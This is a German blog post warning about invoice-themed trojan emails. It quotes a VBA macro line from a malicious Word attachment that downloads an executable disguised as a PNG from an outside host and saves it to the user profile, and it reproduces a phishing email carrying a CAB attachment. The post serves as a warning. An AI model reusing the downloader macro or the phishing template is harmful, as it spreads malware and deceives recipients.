[tawarning] Derzeit sind die Trojaner in verschiedenen Gewändern, meist getarnt als Rechnungen für irgendwelche Bestellungen, die man nicht getätigt hat.
Da wären zum einen die bekannten Microsoft Word Anhänge. Hier hat sich nur die Quelle des Trojaners geändert. Das eigentliche Schadprogramm wird jetzt als Bild im png-Format getarnt, wohl in der Hoffnung, dass ein Proxy-Server mit Virenschutz Bilder nicht prüft.
Sub YVFDXNTOHWT()
GRPGFHKOSHI "http://carhiresoft.com/img/calc.png", Environ("USERPROFILE") & "\useradmin.com"
End Sub
Die Datei (292352 Byte) wird als useradmin.com abgespeichert. Die ist etwas ungünstig, da COM-Programme auf 64-KByte beschränkt sind, tatsächlich handelt es sich jedoch um ein EXE-Programm, was an den beiden ersten Bytes „MZ“ zu erkennen ist.
Interessant ist, dass nach mehreren Stunden nur drei von 52 Antiviren-Programme die Domain carhiresoft.com als Malware-Site einstufen.
Die zweite Variante sendet ein cab-Archive, ein komprimiertes Dateiformat ähnlich zip, das hauptsächlich von Microsoft für Patches verwendet wird. Das CABinet enthält ein ausführbares Programm. Während der Absender sich im Text der Mail wiederfindet, sind die E-Mail Adressen geraten . Die Adressdatenbank der Spammer ist sehr dürftig. Bei mir kommen E-Mails mit Adressen an, die ich noch nie verwendet habe. Typisch sind z.B. sales@ oder homas@. Das fehelnde „t“ in „thomas“ deutet darauf hin, dass dem Spammer entweder ein Programmierfehler unterlaufen ist (Beginn der Zeichenkette bei 0 statt bei 1) oder die Datenbank einen Defekt hatte. [1]
To: „sales@arend-whv.de“ <sales@arend-whv.de>
Subject: Bestellen 210443928
X-Mailer: Cannibalise v6.6
Date: Mon, 16 Jun 2014 14:43:34 +0900
Wir danken Sie für die Benutzung unserer Dienstleistungen.
Ihre Bestellung #210443928 wird 28.06.2014 verschickt werden.
Transaktionsnummer: 8C715D01F608
Datum: 16.06.2014 07:28:45
Summe: €129.89
Bezahlungstyp: Banküberweisung
Die Gesamtrechnung werden Sie in der Datei rechnung735.cab aussuchen.
Hochachtungsvoll,
Izzet Sperling
+49 4221 7782 493
rechnung735.cab
Folgende weitere Absender fand ich im Postfach:
- Hermin Harnisch
+49 3441 3773 868 - Avcioglu Böning
+49 7152 8355 422
Der Name des Absenders im Header korrespondiert mit dem Namen des Absenders im Text; die Telefonnummern und Rechnungsdaten sind von E-Mail zu E-Mail verschieden. Insofern hat sich der Schreiber durchaus Mühe gegeben. Meine Hinweise hierzu scheinen auf fruchtbaren Boden zu fallen. 😉 Nur die täuschende Anrede fehlt dank der schlechten Adressdatenbank.
Der Trojaner ist eine Portable Anwendung; mehr dazu bei VirusTotal unter File detail.
- [1]Die genutzte Domain akzeptiert alles vor dem „@“ als gültigen Adresse, daher kommen diese Mails bis in mein Postfach.↩
Bei mir waren heute morgen noch alle Virenprogramme negativ. Mittlerweile zeigt mein GMail auch den Virus an und ich kann den Anhang nicht mehr herunterladen – heute morgen war das noch anders. Auch trudelt der Virus gerade bei allen Familienmitgliedern ein…
Insofern keine schlechte Leistung; den letzten infizierten Anhang hatte ich irgendwann vor 2005.